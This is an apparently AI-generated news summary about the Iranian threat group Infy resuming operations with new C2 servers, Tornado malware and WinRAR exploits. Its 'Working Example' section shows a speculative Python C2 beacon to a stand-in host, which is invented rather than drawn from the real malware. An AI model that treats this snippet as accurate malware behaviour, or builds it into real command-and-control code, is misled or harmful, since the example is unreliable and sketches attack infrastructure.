Infy Hackers Revive Operations with New C2 Servers and Tornado Malware
These articles are AI-generated summaries. Please check the original sources for full details.
Infy Hackers Resume Operations with New C2 Servers
The Iranian threat group known as Infy has resumed its operations, setting up new command-and-control (C2) servers and deploying updated malware, including Tornado version 51, which uses both HTTP and Telegram for C2. This development comes after a brief hiatus during the Iranian government’s internet blackout in January 2026, with the group’s activities observed to have restarted on January 26, 2026.
Why This Matters
The resurgence of Infy’s operations highlights the evolving nature of state-sponsored threat groups, which continually adapt and improve their tactics to evade detection and achieve their objectives. The use of Telegram as a C2 channel and the exploitation of WinRAR vulnerabilities demonstrate the group’s ability to leverage various vectors to compromise targets, underscoring the need for robust cybersecurity measures to counter such threats. The potential correlation with other threat groups, such as Charming Kitten, further complicates the landscape, suggesting a network of interconnected actors that can share tactics and tools.
Key Insights
- Infy’s renewed activity was observed on January 26, 2026, with the setup of new C2 servers, indicating a possible state-sponsored affiliation given the timing with the end of Iran’s internet blackout.
- The latest version of Tonnerre, codenamed Tornado (version 51), employs a unique approach to generating C2 domain names, using both a new DGA algorithm and fixed names via blockchain data de-obfuscation.
- Infy has been linked to the exploitation of a 1-day security flaw in WinRAR, specifically either CVE-2025-8088 or CVE-2025-6218, to deliver the Tornado payload.
Working Example
# Example of how Tornado malware might establish communication with its C2 server over HTTP
import requests
def establish_c2_communication(c2_server_url):
try:
response = requests.get(c2_server_url)
if response.status_code == 200:
# Execute commands or download additional payloads as instructed by the C2 server
print("C2 communication established successfully.")
else:
print("Failed to establish C2 communication.")
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
# Example usage
c2_server_url = "http://example.com/c2"
establish_c2_communication(c2_server_url)Practical Applications
- Use Case: Infy’s tactics, such as using Telegram for C2 communications and exploiting WinRAR vulnerabilities, can serve as a model for other threat groups, highlighting the importance of monitoring and adapting to emerging threats.
- Pitfall: Overreliance on traditional security measures without considering the evolving nature of threats like Infy can lead to significant vulnerabilities, emphasizing the need for continuous threat intelligence and adaptive cybersecurity strategies.
References:
- http://thehackernews.com/2026/02/infy-hackers-resume-operations-with-new.html
- https://www.safebreach.com/ (for detailed reports on Infy and other threat groups)
Continue reading
Next article
Malicious NGINX Configurations Enable Large-Scale Web Traffic Hijacking Campaign
Related Content
Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense & Government Targets
Iran’s APT42 launched the ‘SpearSpecter’ campaign in September 2025, targeting defense and government officials with the TAMECAT malware.
New DynoWiper Malware Used in Attempted Sandworm Attack on Polish Power Sector
ESET links Russia-backed Sandworm to a failed December 2025 cyberattack using DynoWiper malware against Poland’s power and renewable energy systems.
Chinese State-Backed Hackers Target Southeast Asian Militaries with Custom Malware
Chinese threat actor CL-STA-1087 has targeted Southeast Asian military systems since 2020 using custom backdoors like AppleChris and MemFun for espionage.